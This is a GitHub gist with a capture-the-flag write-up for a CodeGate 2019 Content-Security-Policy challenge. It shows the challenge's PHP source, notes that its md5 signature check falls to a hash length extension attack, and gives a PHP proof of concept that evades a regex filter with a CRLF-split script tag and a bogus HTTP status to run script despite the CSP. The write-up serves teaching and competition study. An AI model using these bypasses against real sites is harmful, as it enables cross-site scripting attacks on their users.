Skip to content

Instantly share code, notes, and snippets.

@stypr

stypr/README.md

Last active Feb 9, 2020
Embed
What would you like to do?
CodeGate 2019 CSP challenge writeup

Solution

  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)

  2. Use custom header and body to trigger CSP bypass.

<?php
require_once 'config.php';
if(!isset($_GET["q"]) || !isset($_GET["sig"])) {
die("?");
}
$api_string = base64_decode($_GET["q"]);
$sig = $_GET["sig"];
if(md5($salt.$api_string) !== $sig){
die("??");
}
//APIs Format : name(b64),p1(b64),p2(b64)|name(b64),p1(b64),p2(b64) ...
$apis = explode("|", $api_string);
foreach($apis as $s) {
$info = explode(",", $s);
if(count($info) != 3)
continue;
$n = base64_decode($info[0]);
$p1 = base64_decode($info[1]);
$p2 = base64_decode($info[2]);
if ($n === "header") {
if(strlen($p1) > 10)
continue;
if(strpos($p1.$p2, ":") !== false || strpos($p1.$p2, "-") !== false) //Don't trick...
continue;
header("$p1: $p2");
}
elseif ($n === "cookie") {
setcookie($p1, $p2);
}
elseif ($n === "body") {
if(preg_match("/<.*>/", $p1))
continue;
echo $p1;
echo "\n<br />\n";
}
elseif ($n === "hello") {
echo "Hello, World!\n";
}
}
<?php
header("Content-Security-Policy: default-src 'self'; script-src 'none'; base-uri 'none';");
// Try with your environment!
if($_GET['go']){
// exploit (3)
// 1. f**k header
header("HTTP/1.0 123 Meh");
// 2. use \r\n to bypass
$encoded_payload = "<script\r\n>alert(1);\r\n</script\r\n>";
if(preg_match("/<.*>/", $encoded_payload)){
die("blocked");
}
echo $encoded_payload;
echo "\n<br />\n";
exit;
}
?>
<a href="?go=go">go</a>
<hr>
<?php
highlight_file("csp.php");
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.